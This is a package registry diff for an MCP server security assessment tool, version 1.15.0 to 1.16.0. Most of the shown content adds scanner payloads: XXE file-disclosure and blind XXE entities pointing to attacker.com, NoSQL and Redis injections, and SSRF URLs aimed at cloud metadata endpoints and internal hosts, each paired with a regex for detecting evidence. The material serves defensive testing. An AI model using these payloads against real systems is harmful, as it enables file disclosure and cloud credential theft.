@bryan-thompson/inspector-assessment-client 1.15.0 → 1.16.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/dist/assets/{OAuthCallback-BleN4Jjs.js → OAuthCallback-KwMiy-L3.js} +1 -1
- package/dist/assets/{OAuthDebugCallback-C__lzEyx.js → OAuthDebugCallback-hckdJlo3.js} +1 -1
- package/dist/assets/{index-CPXmfP9b.js → index-C89umkGV.js} +745 -4350
- package/dist/index.html +1 -1
- package/lib/lib/assessmentTypes.d.ts +123 -0
- package/lib/lib/assessmentTypes.d.ts.map +1 -1
- package/lib/lib/assessmentTypes.js +20 -0
- package/lib/lib/securityPatterns.d.ts +2 -2
- package/lib/lib/securityPatterns.d.ts.map +1 -1
- package/lib/lib/securityPatterns.js +290 -15
- package/lib/services/assessment/AssessmentOrchestrator.d.ts +67 -0
- package/lib/services/assessment/AssessmentOrchestrator.d.ts.map +1 -1
- package/lib/services/assessment/AssessmentOrchestrator.js +91 -1
- package/lib/services/assessment/ResponseValidator.d.ts +7 -34
- package/lib/services/assessment/ResponseValidator.d.ts.map +1 -1
- package/lib/services/assessment/ResponseValidator.js +100 -704
- package/lib/services/assessment/config/annotationPatterns.js +1 -1
- package/lib/services/assessment/lib/RequestHistoryAnalyzer.d.ts +67 -0
- package/lib/services/assessment/lib/RequestHistoryAnalyzer.d.ts.map +1 -0
- package/lib/services/assessment/lib/RequestHistoryAnalyzer.js +191 -0
- package/lib/services/assessment/lib/claudeCodeBridge.d.ts +1 -0
- package/lib/services/assessment/lib/claudeCodeBridge.d.ts.map +1 -1
- package/lib/services/assessment/lib/claudeCodeBridge.js +5 -4
- package/lib/services/assessment/modules/AuthenticationAssessor.d.ts +4 -0
- package/lib/services/assessment/modules/AuthenticationAssessor.d.ts.map +1 -1
- package/lib/services/assessment/modules/AuthenticationAssessor.js +97 -1
- package/lib/services/assessment/modules/CrossCapabilitySecurityAssessor.d.ts +39 -0
- package/lib/services/assessment/modules/CrossCapabilitySecurityAssessor.d.ts.map +1 -0
- package/lib/services/assessment/modules/CrossCapabilitySecurityAssessor.js +330 -0
- package/lib/services/assessment/modules/FunctionalityAssessor.d.ts.map +1 -1
- package/lib/services/assessment/modules/FunctionalityAssessor.js +46 -13
- package/lib/services/assessment/modules/MCPSpecComplianceAssessor.d.ts +5 -0
- package/lib/services/assessment/modules/MCPSpecComplianceAssessor.d.ts.map +1 -1
- package/lib/services/assessment/modules/MCPSpecComplianceAssessor.js +81 -0
- package/lib/services/assessment/modules/ManifestValidationAssessor.js +1 -1
- package/lib/services/assessment/modules/PromptAssessor.d.ts +30 -0
- package/lib/services/assessment/modules/PromptAssessor.d.ts.map +1 -0
- package/lib/services/assessment/modules/PromptAssessor.js +367 -0
- package/lib/services/assessment/modules/ResourceAssessor.d.ts +28 -0
- package/lib/services/assessment/modules/ResourceAssessor.d.ts.map +1 -0
- package/lib/services/assessment/modules/ResourceAssessor.js +296 -0
- package/lib/services/assessment/modules/SecurityAssessor.d.ts +4 -2
- package/lib/services/assessment/modules/SecurityAssessor.d.ts.map +1 -1
- package/lib/services/assessment/modules/SecurityAssessor.js +10 -41
- package/lib/services/assessment/modules/TemporalAssessor.d.ts +1 -0
- package/lib/services/assessment/modules/TemporalAssessor.d.ts.map +1 -1
- package/lib/services/assessment/modules/TemporalAssessor.js +35 -4
- package/lib/utils/jsonUtils.d.ts +68 -0
- package/lib/utils/jsonUtils.d.ts.map +1 -0
- package/lib/utils/jsonUtils.js +141 -0
- package/lib/utils/paramUtils.d.ts +11 -0
- package/lib/utils/paramUtils.d.ts.map +1 -0
- package/lib/utils/paramUtils.js +37 -0
- package/lib/utils/schemaUtils.d.ts +74 -0
- package/lib/utils/schemaUtils.d.ts.map +1 -0
- package/lib/utils/schemaUtils.js +268 -0
- package/package.json +1 -1
|
@@ -1,9 +1,9 @@
|
|
|
1
1
|
/**
|
|
2
2
|
* Backend API Security Patterns
|
|
3
|
-
* Tests MCP server API security with
|
|
3
|
+
* Tests MCP server API security with 18 focused patterns
|
|
4
4
|
*
|
|
5
5
|
* Architecture: Attack-Type with Specific Payloads
|
|
6
|
-
* - Critical Injection (
|
|
6
|
+
* - Critical Injection (6 patterns): Command, Calculator, SQL, Path Traversal, XXE, NoSQL
|
|
7
7
|
* - Input Validation (3 patterns): Type Safety, Boundary Testing, Required Fields
|
|
8
8
|
* - Protocol Compliance (2 patterns): MCP Error Format, Timeout Handling
|
|
9
9
|
* - Tool-Specific Vulnerabilities (7 patterns): Indirect Injection, Unicode Bypass, Nested Injection, Package Squatting, Data Exfiltration, Configuration Drift, Tool Shadowing
|
|
@@ -202,10 +202,141 @@ export const SECURITY_ATTACK_PATTERNS = [
|
|
|
202
202
|
},
|
|
203
203
|
],
|
|
204
204
|
},
|
|
205
|
+
// 5. XXE INJECTION (XML External Entity)
|
|
206
|
+
{
|
|
207
|
+
attackName: "XXE Injection",
|
|
208
|
+
description: "Test if tool processes XML external entities, allowing file disclosure or SSRF",
|
|
209
|
+
payloads: [
|
|
210
|
+
// Classic XXE - file disclosure
|
|
211
|
+
{
|
|
212
|
+
payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
|
|
213
|
+
evidence: /(root:x:0:0|xxe.*processed|external.*entity.*loaded|file.*contents)/i,
|
|
214
|
+
riskLevel: "HIGH",
|
|
215
|
+
description: "XXE file disclosure via SYSTEM entity",
|
|
216
|
+
payloadType: "injection",
|
|
217
|
+
parameterTypes: ["xml", "data", "body", "payload", "content"],
|
|
218
|
+
},
|
|
219
|
+
// XXE with Windows path
|
|
220
|
+
{
|
|
221
|
+
payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]><foo>&xxe;</foo>',
|
|
222
|
+
evidence: /(\[fonts\]|\[extensions\]|xxe.*processed|windows.*file.*accessed)/i,
|
|
223
|
+
riskLevel: "HIGH",
|
|
224
|
+
description: "XXE Windows file disclosure",
|
|
225
|
+
payloadType: "injection",
|
|
226
|
+
parameterTypes: ["xml", "data", "body", "payload"],
|
|
227
|
+
},
|
|
228
|
+
// XXE SSRF via HTTP entity
|
|
229
|
+
{
|
|
230
|
+
payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><foo>&xxe;</foo>',
|
|
231
|
+
evidence: /(ami-id|instance-id|xxe.*fetched|metadata.*accessed|ssrf.*xml)/i,
|
|
232
|
+
riskLevel: "HIGH",
|
|
233
|
+
description: "XXE SSRF to AWS metadata",
|
|
234
|
+
payloadType: "injection",
|
|
235
|
+
parameterTypes: ["xml", "data", "body", "payload"],
|
|
236
|
+
},
|
|
237
|
+
// Parameter entity XXE (blind XXE)
|
|
238
|
+
{
|
|
239
|
+
payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;]><foo>test</foo>',
|
|
240
|
+
evidence: /(dtd.*loaded|parameter.*entity|external.*dtd|xxe.*processed)/i,
|
|
241
|
+
riskLevel: "HIGH",
|
|
242
|
+
description: "Blind XXE via parameter entity",
|
|
243
|
+
payloadType: "injection",
|
|
244
|
+
parameterTypes: ["xml", "data", "body", "payload"],
|
|
245
|
+
},
|
|
246
|
+
// XXE in SOAP request
|
|
247
|
+
{
|
|
248
|
+
payload: '<?xml version="1.0"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><soap:Body><foo>&xxe;</foo></soap:Body></soap:Envelope>',
|
|
249
|
+
evidence: /(root:x:0:0|soap.*xxe|xxe.*soap|external.*entity)/i,
|
|
250
|
+
riskLevel: "HIGH",
|
|
251
|
+
description: "XXE in SOAP envelope",
|
|
252
|
+
payloadType: "injection",
|
|
253
|
+
parameterTypes: ["xml", "soap", "body", "request"],
|
|
254
|
+
},
|
|
255
|
+
],
|
|
256
|
+
},
|
|
257
|
+
// 6. NOSQL INJECTION
|
|
258
|
+
{
|
|
259
|
+
attackName: "NoSQL Injection",
|
|
260
|
+
description: "Test if tool is vulnerable to NoSQL injection attacks (MongoDB, Redis, etc.)",
|
|
261
|
+
payloads: [
|
|
262
|
+
// MongoDB operator injection
|
|
263
|
+
{
|
|
264
|
+
payload: '{"$gt": ""}',
|
|
265
|
+
evidence: /(all.*documents|query.*executed|mongodb.*error|operator.*injection|nosql.*executed)/i,
|
|
266
|
+
riskLevel: "HIGH",
|
|
267
|
+
description: "MongoDB $gt operator injection",
|
|
268
|
+
payloadType: "injection",
|
|
269
|
+
parameterTypes: ["query", "filter", "where", "search", "data"],
|
|
270
|
+
},
|
|
271
|
+
// MongoDB $ne always-true
|
|
272
|
+
{
|
|
273
|
+
payload: '{"$ne": null}',
|
|
274
|
+
evidence: /(returned.*all|bypass.*auth|nosql.*injection|query.*result|documents.*found)/i,
|
|
275
|
+
riskLevel: "HIGH",
|
|
276
|
+
description: "MongoDB $ne bypass injection",
|
|
277
|
+
payloadType: "injection",
|
|
278
|
+
parameterTypes: ["query", "filter", "where", "password", "username"],
|
|
279
|
+
},
|
|
280
|
+
// MongoDB $where JavaScript injection
|
|
281
|
+
{
|
|
282
|
+
payload: '{"$where": "this.password.match(/.*/)"}',
|
|
283
|
+
evidence: /(javascript.*executed|\$where.*processed|nosql.*js|all.*passwords|query.*executed)/i,
|
|
284
|
+
riskLevel: "HIGH",
|
|
285
|
+
description: "MongoDB $where JavaScript injection",
|
|
286
|
+
payloadType: "injection",
|
|
287
|
+
parameterTypes: ["query", "filter", "where", "data"],
|
|
288
|
+
},
|
|
289
|
+
// MongoDB $regex DOS
|
|
290
|
+
{
|
|
291
|
+
payload: '{"$regex": "^(a+)+$"}',
|
|
292
|
+
evidence: /(regex.*executed|redos|timeout|catastrophic.*backtracking|query.*slow)/i,
|
|
293
|
+
riskLevel: "MEDIUM",
|
|
294
|
+
description: "MongoDB ReDoS via $regex",
|
|
295
|
+
payloadType: "injection",
|
|
296
|
+
parameterTypes: ["query", "filter", "search", "pattern"],
|
|
297
|
+
},
|
|
298
|
+
// MongoDB union-style query
|
|
299
|
+
{
|
|
300
|
+
payload: "admin', $or: [ {}, { 'a': 'a",
|
|
301
|
+
evidence: /(admin.*returned|auth.*bypass|or.*injection|nosql.*executed)/i,
|
|
302
|
+
riskLevel: "HIGH",
|
|
303
|
+
description: "MongoDB $or injection bypass",
|
|
304
|
+
payloadType: "injection",
|
|
305
|
+
parameterTypes: ["username", "user", "name", "query"],
|
|
306
|
+
},
|
|
307
|
+
// Redis command injection
|
|
308
|
+
{
|
|
309
|
+
payload: "test\r\nCONFIG GET *\r\n",
|
|
310
|
+
evidence: /(redis.*config|requirepass|maxmemory|save.*seconds|redis.*command.*executed)/i,
|
|
311
|
+
riskLevel: "HIGH",
|
|
312
|
+
description: "Redis CRLF command injection",
|
|
313
|
+
payloadType: "injection",
|
|
314
|
+
parameterTypes: ["key", "value", "data", "input"],
|
|
315
|
+
},
|
|
316
|
+
// Redis Lua script injection
|
|
317
|
+
{
|
|
318
|
+
payload: "EVAL \"return redis.call('INFO')\" 0",
|
|
319
|
+
evidence: /(redis_version|used_memory|connected_clients|lua.*executed)/i,
|
|
320
|
+
riskLevel: "HIGH",
|
|
321
|
+
description: "Redis Lua script injection",
|
|
322
|
+
payloadType: "injection",
|
|
323
|
+
parameterTypes: ["script", "command", "query", "data"],
|
|
324
|
+
},
|
|
325
|
+
// CouchDB injection
|
|
326
|
+
{
|
|
327
|
+
payload: '{"selector": {"$or": [{"_id": {"$gt": null}}]}}',
|
|
328
|
+
evidence: /(all.*documents|couchdb.*query|selector.*executed|documents.*returned)/i,
|
|
329
|
+
riskLevel: "HIGH",
|
|
330
|
+
description: "CouchDB selector injection",
|
|
331
|
+
payloadType: "injection",
|
|
332
|
+
parameterTypes: ["query", "selector", "filter", "find"],
|
|
333
|
+
},
|
|
334
|
+
],
|
|
335
|
+
},
|
|
205
336
|
// ==========================================
|
|
206
337
|
// INPUT VALIDATION TESTS (3)
|
|
207
338
|
// ==========================================
|
|
208
|
-
//
|
|
339
|
+
// 7. TYPE SAFETY
|
|
209
340
|
{
|
|
210
341
|
attackName: "Type Safety",
|
|
211
342
|
description: "Test if tool validates parameter types correctly",
|
|
@@ -233,7 +364,7 @@ export const SECURITY_ATTACK_PATTERNS = [
|
|
|
233
364
|
},
|
|
234
365
|
],
|
|
235
366
|
},
|
|
236
|
-
//
|
|
367
|
+
// 8. BOUNDARY TESTING
|
|
237
368
|
{
|
|
238
369
|
attackName: "Boundary Testing",
|
|
239
370
|
description: "Test edge cases and boundary conditions",
|
|
@@ -261,7 +392,7 @@ export const SECURITY_ATTACK_PATTERNS = [
|
|
|
261
392
|
},
|
|
262
393
|
],
|
|
263
394
|
},
|
|
264
|
-
//
|
|
395
|
+
// 9. REQUIRED FIELDS
|
|
265
396
|
{
|
|
266
397
|
attackName: "Required Fields",
|
|
267
398
|
description: "Test if tool validates required parameters",
|
|
@@ -278,7 +409,7 @@ export const SECURITY_ATTACK_PATTERNS = [
|
|
|
278
409
|
// ==========================================
|
|
279
410
|
// PROTOCOL COMPLIANCE TESTS (2)
|
|
280
411
|
// ==========================================
|
|
281
|
-
//
|
|
412
|
+
// 10. MCP ERROR FORMAT
|
|
282
413
|
{
|
|
283
414
|
attackName: "MCP Error Format",
|
|
284
415
|
description: "Verify errors follow MCP protocol specification",
|
|
@@ -292,7 +423,7 @@ export const SECURITY_ATTACK_PATTERNS = [
|
|
|
292
423
|
},
|
|
293
424
|
],
|
|
294
425
|
},
|
|
295
|
-
//
|
|
426
|
+
// 11. TIMEOUT HANDLING
|
|
296
427
|
{
|
|
297
428
|
attackName: "Timeout Handling",
|
|
298
429
|
description: "Test if tool handles long operations gracefully",
|
|
@@ -309,10 +440,10 @@ export const SECURITY_ATTACK_PATTERNS = [
|
|
|
309
440
|
// ==========================================
|
|
310
441
|
// TOOL-SPECIFIC VULNERABILITY TESTS (7)
|
|
311
442
|
// ==========================================
|
|
312
|
-
//
|
|
443
|
+
// 12. INDIRECT PROMPT INJECTION (HTTP URL Fetching + SSRF)
|
|
313
444
|
{
|
|
314
445
|
attackName: "Indirect Prompt Injection",
|
|
315
|
-
description: "Test if tool fetches
|
|
446
|
+
description: "Test if tool fetches external content or allows SSRF attacks against internal services",
|
|
316
447
|
payloads: [
|
|
317
448
|
{
|
|
318
449
|
payload: "http://example.com",
|
|
@@ -330,9 +461,153 @@ export const SECURITY_ATTACK_PATTERNS = [
|
|
|
330
461
|
payloadType: "injection",
|
|
331
462
|
parameterTypes: ["url", "uri", "link"],
|
|
332
463
|
},
|
|
464
|
+
// SSRF - Local/Internal Services
|
|
465
|
+
{
|
|
466
|
+
payload: "http://localhost",
|
|
467
|
+
evidence: /(SSRF.*fetched|SSRF.*attempted|fetched.*internal|127\.0\.0\.1|localhost.*request|connection.*refused|ECONNREFUSED)/i,
|
|
468
|
+
riskLevel: "HIGH",
|
|
469
|
+
description: "SSRF - localhost access attempt",
|
|
470
|
+
payloadType: "injection",
|
|
471
|
+
parameterTypes: ["url", "uri", "link", "endpoint", "address"],
|
|
472
|
+
},
|
|
473
|
+
{
|
|
474
|
+
payload: "http://127.0.0.1:6379",
|
|
475
|
+
evidence: /(SSRF.*fetched|SSRF.*attempted|redis|PONG|\+OK|127\.0\.0\.1.*request|fetched.*internal)/i,
|
|
476
|
+
riskLevel: "HIGH",
|
|
477
|
+
description: "SSRF - Redis service access",
|
|
478
|
+
payloadType: "injection",
|
|
479
|
+
parameterTypes: ["url", "uri", "link", "endpoint"],
|
|
480
|
+
},
|
|
481
|
+
{
|
|
482
|
+
payload: "http://127.0.0.1:3306",
|
|
483
|
+
evidence: /(SSRF.*fetched|SSRF.*attempted|mysql|mariadb|3306.*request|fetched.*internal)/i,
|
|
484
|
+
riskLevel: "HIGH",
|
|
485
|
+
description: "SSRF - MySQL service access",
|
|
486
|
+
payloadType: "injection",
|
|
487
|
+
parameterTypes: ["url", "uri", "link", "endpoint"],
|
|
488
|
+
},
|
|
489
|
+
// SSRF - Cloud Metadata Endpoints
|
|
490
|
+
{
|
|
491
|
+
payload: "http://169.254.169.254/latest/meta-data/",
|
|
492
|
+
evidence: /(SSRF.*fetched|SSRF.*attempted|ami-id|instance-id|iam|security-credentials|metadata.*169\.254|fetched.*internal)/i,
|
|
493
|
+
riskLevel: "HIGH",
|
|
494
|
+
description: "SSRF - AWS metadata endpoint",
|
|
495
|
+
payloadType: "injection",
|
|
496
|
+
parameterTypes: ["url", "uri", "link", "endpoint"],
|
|
497
|
+
},
|
|
498
|
+
{
|
|
499
|
+
// GCP metadata via IP (more reliable than metadata.google.internal which requires GCP DNS)
|
|
500
|
+
payload: "http://169.254.169.254/computeMetadata/v1/project/project-id",
|
|
501
|
+
evidence: /(SSRF.*attempted.*169\.254|SSRF.*fetched.*169\.254|HTTPConnectionPool.*169\.254|attempted.*SSRF.*metadata|google.*project|gcp.*metadata)/i,
|
|
502
|
+
riskLevel: "HIGH",
|
|
503
|
+
description: "SSRF - GCP metadata endpoint",
|
|
504
|
+
payloadType: "injection",
|
|
505
|
+
parameterTypes: ["url", "uri", "link", "endpoint"],
|
|
506
|
+
},
|
|
507
|
+
{
|
|
508
|
+
payload: "http://169.254.169.254/metadata/instance",
|
|
509
|
+
evidence: /(SSRF.*fetched|SSRF.*attempted|subscriptionId|resourceGroup|vmId|azure.*metadata|fetched.*internal)/i,
|
|
510
|
+
riskLevel: "HIGH",
|
|
511
|
+
description: "SSRF - Azure metadata endpoint",
|
|
512
|
+
payloadType: "injection",
|
|
513
|
+
parameterTypes: ["url", "uri", "link", "endpoint"],
|
|
514
|
+
},
|
|
515
|
+
// SSRF - Internal Network
|
|
516
|
+
{
|
|
517
|
+
payload: "http://192.168.1.1",
|
|
518
|
+
evidence: /(SSRF.*fetched|SSRF.*attempted|192\.168.*request|fetched.*internal|router|gateway)/i,
|
|
519
|
+
riskLevel: "HIGH",
|
|
520
|
+
description: "SSRF - Internal network access",
|
|
521
|
+
payloadType: "injection",
|
|
522
|
+
parameterTypes: ["url", "uri", "link", "endpoint"],
|
|
523
|
+
},
|
|
524
|
+
{
|
|
525
|
+
payload: "http://10.0.0.1",
|
|
526
|
+
evidence: /(SSRF.*fetched|SSRF.*attempted|10\.0\.0.*request|fetched.*internal|private.*network)/i,
|
|
527
|
+
riskLevel: "HIGH",
|
|
528
|
+
description: "SSRF - Private network (10.x) access",
|
|
529
|
+
payloadType: "injection",
|
|
530
|
+
parameterTypes: ["url", "uri", "link", "endpoint"],
|
|
531
|
+
},
|
|
532
|
+
// SSRF - File Protocol
|
|
533
|
+
{
|
|
534
|
+
payload: "file:///etc/passwd",
|
|
535
|
+
evidence: /(root:x:0:0|file.*protocol|local.*file|file.*accessed|SSRF.*file)/i,
|
|
536
|
+
riskLevel: "HIGH",
|
|
537
|
+
description: "SSRF - file:// protocol abuse",
|
|
538
|
+
payloadType: "injection",
|
|
539
|
+
parameterTypes: ["url", "uri", "link", "endpoint"],
|
|
540
|
+
},
|
|
541
|
+
// SSRF - DNS Rebinding Attacks
|
|
542
|
+
// DNS rebinding bypasses IP-based checks by initially resolving to a safe IP,
|
|
543
|
+
// then rebinding to internal IPs after security validation
|
|
544
|
+
{
|
|
545
|
+
payload: "http://rebind.network/dnsbin",
|
|
546
|
+
evidence: /(dns.*rebind|rebind.*detected|internal.*access.*after|SSRF.*rebind|resolved.*internal)/i,
|
|
547
|
+
riskLevel: "HIGH",
|
|
548
|
+
description: "DNS rebinding - generic rebind domain",
|
|
549
|
+
payloadType: "injection",
|
|
550
|
+
parameterTypes: ["url", "uri", "link", "endpoint"],
|
|
551
|
+
},
|
|
552
|
+
{
|
|
553
|
+
payload: "http://a]@127.0.0.1/",
|
|
554
|
+
evidence: /(localhost|127\.0\.0\.1|internal.*access|SSRF.*bypass|host.*header.*injection)/i,
|
|
555
|
+
riskLevel: "HIGH",
|
|
556
|
+
description: "DNS rebinding - URL parser confusion",
|
|
557
|
+
payloadType: "injection",
|
|
558
|
+
parameterTypes: ["url", "uri", "link", "endpoint"],
|
|
559
|
+
},
|
|
560
|
+
{
|
|
561
|
+
payload: "http://127.0.0.1.nip.io",
|
|
562
|
+
evidence: /(localhost|127\.0\.0\.1|internal.*access|nip\.io.*resolved|SSRF.*bypass)/i,
|
|
563
|
+
riskLevel: "HIGH",
|
|
564
|
+
description: "DNS rebinding - nip.io wildcard DNS",
|
|
565
|
+
payloadType: "injection",
|
|
566
|
+
parameterTypes: ["url", "uri", "link", "endpoint"],
|
|
567
|
+
},
|
|
568
|
+
{
|
|
569
|
+
payload: "http://169.254.169.254.nip.io/latest/meta-data/",
|
|
570
|
+
evidence: /(metadata|ami-id|instance-id|SSRF.*metadata|nip\.io.*resolved)/i,
|
|
571
|
+
riskLevel: "HIGH",
|
|
572
|
+
description: "DNS rebinding - AWS metadata via nip.io",
|
|
573
|
+
payloadType: "injection",
|
|
574
|
+
parameterTypes: ["url", "uri", "link", "endpoint"],
|
|
575
|
+
},
|
|
576
|
+
{
|
|
577
|
+
payload: "http://0x7f000001",
|
|
578
|
+
evidence: /(localhost|127\.0\.0\.1|internal.*access|SSRF.*hex|hex.*ip.*resolved)/i,
|
|
579
|
+
riskLevel: "HIGH",
|
|
580
|
+
description: "DNS rebinding - hexadecimal IP encoding",
|
|
581
|
+
payloadType: "injection",
|
|
582
|
+
parameterTypes: ["url", "uri", "link", "endpoint"],
|
|
583
|
+
},
|
|
584
|
+
{
|
|
585
|
+
payload: "http://2130706433",
|
|
586
|
+
evidence: /(localhost|127\.0\.0\.1|internal.*access|SSRF.*decimal|decimal.*ip.*resolved)/i,
|
|
587
|
+
riskLevel: "HIGH",
|
|
588
|
+
description: "DNS rebinding - decimal IP encoding",
|
|
589
|
+
payloadType: "injection",
|
|
590
|
+
parameterTypes: ["url", "uri", "link", "endpoint"],
|
|
591
|
+
},
|
|
592
|
+
{
|
|
593
|
+
payload: "http://[::ffff:127.0.0.1]",
|
|
594
|
+
evidence: /(localhost|127\.0\.0\.1|internal.*access|ipv6.*mapped|SSRF.*ipv6)/i,
|
|
595
|
+
riskLevel: "HIGH",
|
|
596
|
+
description: "DNS rebinding - IPv6 mapped IPv4",
|
|
597
|
+
payloadType: "injection",
|
|
598
|
+
parameterTypes: ["url", "uri", "link", "endpoint"],
|
|
599
|
+
},
|
|
600
|
+
{
|
|
601
|
+
payload: "http://spoofed.burpcollaborator.net",
|
|
602
|
+
evidence: /(burp.*collaborator|external.*interaction|dns.*lookup.*detected|SSRF.*detected)/i,
|
|
603
|
+
riskLevel: "HIGH",
|
|
604
|
+
description: "DNS rebinding - out-of-band interaction test",
|
|
605
|
+
payloadType: "injection",
|
|
606
|
+
parameterTypes: ["url", "uri", "link", "endpoint"],
|
|
607
|
+
},
|
|
333
608
|
],
|
|
334
609
|
},
|
|
335
|
-
//
|
|
610
|
+
// 13. UNICODE BYPASS
|
|
336
611
|
{
|
|
337
612
|
attackName: "Unicode Bypass",
|
|
338
613
|
description: "Test if tool decodes and executes unicode-encoded commands",
|
|
@@ -355,7 +630,7 @@ export const SECURITY_ATTACK_PATTERNS = [
|
|
|
355
630
|
},
|
|
356
631
|
],
|
|
357
632
|
},
|
|
358
|
-
//
|
|
633
|
+
// 14. NESTED INJECTION
|
|
359
634
|
{
|
|
360
635
|
attackName: "Nested Injection",
|
|
361
636
|
description: "Test if tool executes hidden instructions in nested JSON",
|
|
@@ -378,7 +653,7 @@ export const SECURITY_ATTACK_PATTERNS = [
|
|
|
378
653
|
},
|
|
379
654
|
],
|
|
380
655
|
},
|
|
381
|
-
//
|
|
656
|
+
// 15. PACKAGE SQUATTING
|
|
382
657
|
{
|
|
383
658
|
attackName: "Package Squatting",
|
|
384
659
|
description: "Test if tool downloads typosquatted packages",
|
|
@@ -401,7 +676,7 @@ export const SECURITY_ATTACK_PATTERNS = [
|
|
|
401
676
|
},
|
|
402
677
|
],
|
|
403
678
|
},
|
|
404
|
-
//
|
|
679
|
+
// 16. DATA EXFILTRATION
|
|
405
680
|
{
|
|
406
681
|
attackName: "Data Exfiltration",
|
|
407
682
|
description: "Test if tool leaks sensitive data like API keys, credentials, or environment variables",
|
|
@@ -448,7 +723,7 @@ export const SECURITY_ATTACK_PATTERNS = [
|
|
|
448
723
|
},
|
|
449
724
|
],
|
|
450
725
|
},
|
|
451
|
-
//
|
|
726
|
+
// 17. CONFIGURATION DRIFT
|
|
452
727
|
{
|
|
453
728
|
attackName: "Configuration Drift",
|
|
454
729
|
description: "Test if tool allows unauthorized modification of runtime configuration",
|
|
@@ -487,7 +762,7 @@ export const SECURITY_ATTACK_PATTERNS = [
|
|
|
487
762
|
},
|
|
488
763
|
],
|
|
489
764
|
},
|
|
490
|
-
//
|
|
765
|
+
// 18. TOOL SHADOWING
|
|
491
766
|
{
|
|
492
767
|
attackName: "Tool Shadowing",
|
|
493
768
|
description: "Test if tool allows shadowing, poisoning, or overriding other tools",
|
|
@@ -5,6 +5,53 @@
|
|
|
5
5
|
import { MCPDirectoryAssessment, AssessmentConfiguration, ManifestJsonSchema, ProgressCallback } from "../../lib/assessmentTypes.js";
|
|
6
6
|
import { Tool, CompatibilityCallToolResult } from "@modelcontextprotocol/sdk/types.js";
|
|
7
7
|
import { ClaudeCodeBridge, ClaudeCodeBridgeConfig } from "./lib/claudeCodeBridge.js";
|
|
8
|
+
/**
|
|
9
|
+
* MCP Resource interface for assessment context
|
|
10
|
+
*/
|
|
11
|
+
export interface MCPResource {
|
|
12
|
+
uri: string;
|
|
13
|
+
name?: string;
|
|
14
|
+
description?: string;
|
|
15
|
+
mimeType?: string;
|
|
16
|
+
}
|
|
17
|
+
/**
|
|
18
|
+
* MCP Resource Template interface for assessment context
|
|
19
|
+
*/
|
|
20
|
+
export interface MCPResourceTemplate {
|
|
21
|
+
uriTemplate: string;
|
|
22
|
+
name?: string;
|
|
23
|
+
description?: string;
|
|
24
|
+
mimeType?: string;
|
|
25
|
+
}
|
|
26
|
+
/**
|
|
27
|
+
* MCP Prompt interface for assessment context
|
|
28
|
+
*/
|
|
29
|
+
export interface MCPPrompt {
|
|
30
|
+
name: string;
|
|
31
|
+
description?: string;
|
|
32
|
+
arguments?: Array<{
|
|
33
|
+
name: string;
|
|
34
|
+
description?: string;
|
|
35
|
+
required?: boolean;
|
|
36
|
+
}>;
|
|
37
|
+
}
|
|
38
|
+
/**
|
|
39
|
+
* MCP Server Capabilities interface
|
|
40
|
+
*/
|
|
41
|
+
export interface MCPServerCapabilities {
|
|
42
|
+
tools?: {
|
|
43
|
+
listChanged?: boolean;
|
|
44
|
+
};
|
|
45
|
+
resources?: {
|
|
46
|
+
subscribe?: boolean;
|
|
47
|
+
listChanged?: boolean;
|
|
48
|
+
};
|
|
49
|
+
prompts?: {
|
|
50
|
+
listChanged?: boolean;
|
|
51
|
+
};
|
|
52
|
+
logging?: Record<string, unknown>;
|
|
53
|
+
experimental?: Record<string, unknown>;
|
|
54
|
+
}
|
|
8
55
|
export interface AssessmentContext {
|
|
9
56
|
serverName: string;
|
|
10
57
|
tools: Tool[];
|
|
@@ -24,6 +71,23 @@ export interface AssessmentContext {
|
|
|
24
71
|
manifestJson?: ManifestJsonSchema;
|
|
25
72
|
manifestRaw?: string;
|
|
26
73
|
onProgress?: ProgressCallback;
|
|
74
|
+
resources?: MCPResource[];
|
|
75
|
+
resourceTemplates?: MCPResourceTemplate[];
|
|
76
|
+
prompts?: MCPPrompt[];
|
|
77
|
+
serverCapabilities?: MCPServerCapabilities;
|
|
78
|
+
readResource?: (uri: string) => Promise<string>;
|
|
79
|
+
getPrompt?: (name: string, args: Record<string, string>) => Promise<{
|
|
80
|
+
messages: Array<{
|
|
81
|
+
role: string;
|
|
82
|
+
content: string;
|
|
83
|
+
}>;
|
|
84
|
+
}>;
|
|
85
|
+
transportConfig?: {
|
|
86
|
+
type: "stdio" | "sse" | "streamable-http";
|
|
87
|
+
url?: string;
|
|
88
|
+
usesTLS?: boolean;
|
|
89
|
+
oauthEnabled?: boolean;
|
|
90
|
+
};
|
|
27
91
|
}
|
|
28
92
|
export declare class AssessmentOrchestrator {
|
|
29
93
|
private config;
|
|
@@ -44,6 +108,9 @@ export declare class AssessmentOrchestrator {
|
|
|
44
108
|
private portabilityAssessor?;
|
|
45
109
|
private externalAPIScannerAssessor?;
|
|
46
110
|
private temporalAssessor?;
|
|
111
|
+
private resourceAssessor?;
|
|
112
|
+
private promptAssessor?;
|
|
113
|
+
private crossCapabilityAssessor?;
|
|
47
114
|
constructor(config?: Partial<AssessmentConfiguration>);
|
|
48
115
|
/**
|
|
49
116
|
* Initialize Claude Code Bridge for intelligent analysis
|
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"AssessmentOrchestrator.d.ts","sourceRoot":"","sources":["../../../src/services/assessment/AssessmentOrchestrator.ts"],"names":[],"mappings":"AAAA;;;GAGG;AAEH,OAAO,EACL,sBAAsB,EACtB,uBAAuB,EAGvB,kBAAkB,EAClB,gBAAgB,EACjB,MAAM,uBAAuB,CAAC;AAC/B,OAAO,EACL,IAAI,EACJ,2BAA2B,EAC5B,MAAM,oCAAoC,CAAC;
|
|
1
|
+
